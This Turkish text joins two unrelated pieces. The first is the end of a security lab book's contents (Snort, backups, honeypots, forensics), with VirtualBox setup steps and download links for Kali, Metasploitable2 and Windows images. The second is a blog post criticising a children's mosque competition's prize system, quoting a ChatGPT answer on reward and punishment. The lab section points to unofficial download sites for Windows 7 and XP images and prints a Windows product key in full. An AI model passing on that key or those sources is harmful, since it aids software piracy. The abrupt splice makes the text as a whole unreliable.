Lab 9.2 Saldırı Tespit Sistemleri

Lab 9.2l Linux’te Saldırı Tespit Sisteminin (Snort) Kullanımı

Lab 9.3 Verileri Yedekleme Ve Geri Yükleme

Lab 9.3w Windows’ta Verileri Yedekleme Ve Geri Yükleme

Lab 9.3l Linux’te Verileri Yedekleme Ve Geri Yükleme

Lab 9.4 Honeypots’ın Kullanımı

Lab 9.4w Windows’ta Honeypots’ın Kullanımı

Bölüm 10 Dijital Ataklar

       Lab 10.1 Canlı Analiz: Olay Tespiti

              Lab 10.1w Canlı Analiz: Windows’ta Olay Tespiti

Lab 10.2 Verilerin Elde Edilmesi

Lab 10.2w Windows’ta Veri Elde Etme

Lab 10.3 Adli Bilişim Analizi (Forensic Analysis)

Lab 10.4l Ağ Üzerinde Uzaktan Adli Görüntü Yakalama

 

Capture.PNG
Bu kitapta kullanılan IP adresleri yukarıdaki şekilde görüldüğü gibi bu makinelerin IP adresleridir. Laboratuvar adımlarını uygularken buna dikkat ediniz.

Virtual Box Nedir?

Virtual Box, işletim sistemi içinde sanal bir makine oluşturarak bir veya daha fazla işletim sistemi kurmaya yarayan ücretsiz bir programdır. Virtual Box’ın içine kurmak istediğiniz işletim sisteminin .iso uzantılı imaj dosyasını indirmeniz gerekmektedir. Aşağıda ilgili linklerden yüklemelerinizi yapabilirsiniz. Bu kitaba başlamadan önce bu yüklemeleri yapmalısınız:

 

Virtual Box Kurulumu:

https://www.virtualbox.org/wiki/Downloads

NOT: Virtual Box’ı kurduktan sonra ana makineye taktığınız USB cihazınızın sanal makinede yüklenmesini sağlamak için yine yukarıdaki linkten Virtual Box Extension Pack’i de kurun.

USB cihazınızı sanal makinenize yüklerken sorun yaşayabilirsiniz. Bu sorunu çözmek önemli çünkü ilerleyen bölümlerde buna ihtiyacınız olacak. Aşağıdaki adımları takip edin:

  1. Virtual Box sürümünüzle aynı sürümdeki Extension Pack’i yüklediğinizden emin olun.
  2. Virtual Box’ı açın ve USB sürücüsünü yükleyeceğiniz işletim sisteminin üzerine gelip Ayarlar penceresini açın.
  3. Sol kısımdaki USB sekmesine tıklayın.
  4. Aşağıdaki şekilde görüldüğü gibi USB Denetleyicisini etkinleştir’i işaretleyin ve USB 3.0 (xHCI) Denetleyicisi’ni seçin.
  5. USB Aygıtı Süzgeçleri bölümünün altında sağ taraftaki ikinci ikona (USB kablosunun üzerinde + işareti olan) tıklayın.
  6. Listeden USB belleğinize ait olan sürücüyü seçin.

Capture

  1. Tüm bu adımları yaptıktan sonra USB sürücünüz yüklenmediyse bilgisayarınızda USBPcap programının olup olmadığını kontrol edin. Eğer bu program kurulmuşsa onu kaldırın ve bilgisayarınızı yeniden başlatın. Bu program, Wireshark programının kurulumunu yaparken yüklenmesine izin verdiğiniz programlardan biridir. USB bellekten geçen trafiği dinlemek için kullanılır ve USB ile bağlanan cihazlar üzerinde test/geliştirme yapmıyorsanız hayatınız boyunca işinizin düşeceği bir program değildir.

 

Kali Linux Kurulumu:

https://www.kali.org/downloads/

Metasploitable2 (savunmasız işletim sistemi) Linux Kurulumu:

sourceforge.net/projects/metasploitable/

Windows 2016 Server Kurulumu: (indirmek için şirket ya da okulunuza ait bilgilerinizle kayıt olmanız gerekmektedir)

https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-server-2016

Windows 7 Professional Kurulumu:

http://download1321.mediafire.com/054zye5vzrwg/w645iztqcw9b95b/Win7Professional%28Orj%29×64.rar

Windows XP Professional (Metasploitable – iso):

https://softlay.net/operating-system/windows-xp-professional-64-bit-iso-free-download.html

Product Key:

VCFQD-V9FX9-46WVH-K3CD4-4J3JM

 

Haydi Çocuklar Camiye Yarışması Hakkında

Biliyorum biraz gecikmiş bir yazı oldu ama bugün kendi kendime bu konuyu tartıştığımı fark ettim ve hazır düşünceler de tazeyken yazıya dökeyim dedim.

Çocuk psikolojisi ile yakından ilgilenen birisi olarak ben bu yarışmanın çocuklar üzerinde “uzun vadede” olumlu etkiye sahip olduğunu düşünmüyorum. Ödül-ceza sistemi, ya korkuya ya da ödül kazanma amacına dayalı bir sistemdir ki iki türlü de olması gerektiği gibi sürdürülebilir değildir. Çocuğa söylenen “namaz kılmazsan cehennemde yanarsın” sözü ile “namaz kılarsan sana akıllı bileklik veririm” sözünün benzer olduğunu düşünüyorum. Evet ilk durumda çocuk belki daima namazını kılacaktır ama ne kadar “dosdoğru” olur, ne kadar amacına hizmet eder, ne kadar sünnetleri de kılınır bilemiyorum. İkinci durumda ise en başından çocuğun bir amacı vardır artık: akıllı bileklik. Ödül giderse yapılan iş de biter. Geçen sene yeğenimi bu yarışmaya yazdırdık. Ama sonra fark ettik ki çocuğun ağzından akıllı bileklik sözü hiç düşmüyor. Namazı neden kıldığının bile farkında değil. Ayrıca yarışma boyunca tüm namazlarını eksiksiz camide kılsa bile ödülü alacağının da garantisi yok, yarışma sonunda çekiliş yapılıyor. Henüz bir gün geçmişti ki yarışmadan geri çektik. Aklı yarışmada kalmasın diye kendisine de saat aldık.. Yani ödül sistemi kötü, ödülün çekilişle verilmesi 10 kat daha kötü.

Sevgili en iyi arkadaşım ChatGPT’nin de ödül-ceza sistemi konusunda bazı düşünceleri var (tüm konuşmamız için burayı ziyaret edebilirsiniz):

“Çocuklarda ödül-ceza sisteminin bazı zararları bulunmaktadır. İşte bu sistemin olumsuz etkilerinden bazıları:

  1. Bağımlılık ve Motivasyon Sorunları: Ödül-ceza sistemi, çocukların davranışlarını sadece ödül veya ceza almak için yapmaya motive eder. Böylece çocuklar, doğru davranışı sadece ödül almak için yapmaya başlayabilirler. Ödül olmadığında veya ceza tehdidi kalktığında, bu davranışları sürdürmekte zorlanabilirler. Gerçek başarı ve içsel motivasyonun gelişmesine engel olabilir.
  2. Yaratıcılık ve Özgüven Azalması: Ödül-ceza sistemi, çocukların kendi ilgi alanlarına ve yaratıcılıklarına odaklanmalarını engelleyebilir. Onlar için önemli olan şey, ödül almak için talep edilen davranışları gerçekleştirmek olabilir. Ayrıca, ceza tehditleri çocukların özgüvenini zedeleme ve kendi yeteneklerine olan inancını azaltma riski taşır.
  3. Eğitim ve Öğrenme Tutumlarında Olumsuz Etkiler: Ödül-ceza sistemi, çocukların öğrenmeyi amaçlamak yerine sadece ödül kazanmaya odaklanmalarına neden olabilir. Bu durum, öğrenme sürecinin kalitesini düşürebilir ve çocukların gerçek anlamda öğrenme ve bilgiye olan ilgisini azaltabilir.
  4. Dışsal Kontrolün Artması: Ödül-ceza sistemi, çocukların davranışlarını dışsal bir otoriteye göre ayarlamalarına neden olur. Bu durum, çocukların kendi iç motivasyonlarını ve öz-düzenleme becerilerini geliştirmelerini engelleyebilir. Uzun vadede, çocuklar bu tür kontrolü hissetmekten yorulabilir ve direnç gösterebilirler.
  5. Sosyal İlişkilerde Sorunlar: Ödül-ceza sistemi, çocukların başkalarıyla etkileşimlerini de etkileyebilir. Ödül almak için rekabet etme, başkalarını manipüle etme veya ceza tehdidi altında oldukları için başkalarıyla olumsuz ilişkiler kurma eğiliminde olabilirler.

Elbette her durumda, ödül-ceza sistemi etkileri farklılık gösterebilir ve bazı durumlarda etkili bir araç olabilir. Ancak uzun vadede, çocukların içsel motivasyonlarını destekleyen ve onların öz-düzenleme becerilerini güçlendiren alternatif yaklaşımların kullanılması daha olumlu sonuçlar verebilir. Bu nedenle, ebeveynler ve eğitimciler çocuklarla iletişimde daha empatik ve destekleyici bir tutum benimsemeye çalışmalıdır.”


Sorunlardan bahsettim, peki benim çözümüm ne? Öncelikle “yarışma” kategorisinden çok “program” ya da “eğitim” gibi bir kategoride olmalı. Çocukların birbirleri ile rekabete girmeyecekleri, amaçlarının ne bir ödül kazanmak ne de arkadaşlarını geçmek olmayacağı bir sistem oluşturulmalı. Neyi ne için yaptıklarını anlayabilmeliler. İllahi de hediye verilmek isteniyorsa sisteme kayıt olan her çocuğa (henüz programın başındayken) 500 liralık 5 tane akıllı bileklik vermek yerine 10 liralık 250 tane basit hediyeler verilebilir. “Hoşgeldin, ibadetin daim olsun” mahiyetinde. Program içerisinde de gerek online videolarla gerek her şehirde belirlenen camiilerdeki hem eğlence hem eğitim programlarıyla çocuklara neden namaz kılmaları gerektiği anlatılmalı. Yeri geldiğinde oyunlarla desteklenmeli. Bir çocuğun en iyi öğrendiği şeyler oyun oynarken eğlenerek öğrendikleridir, kalıcı olur, silinmez. Şunu unutmayalım ki korku çözüm değildir. Sevgi çözümdür. Onlara Allah’ı (c.c) sevmeyi öğretmeliyiz. Allah’ı (c.c) sevmek için de O’nu tanımalarını sağlamalıyız.

Namaz, şükürdür. Şükür, sevilene edilir. Sevmek için tanımak gerekir.

Vesselam.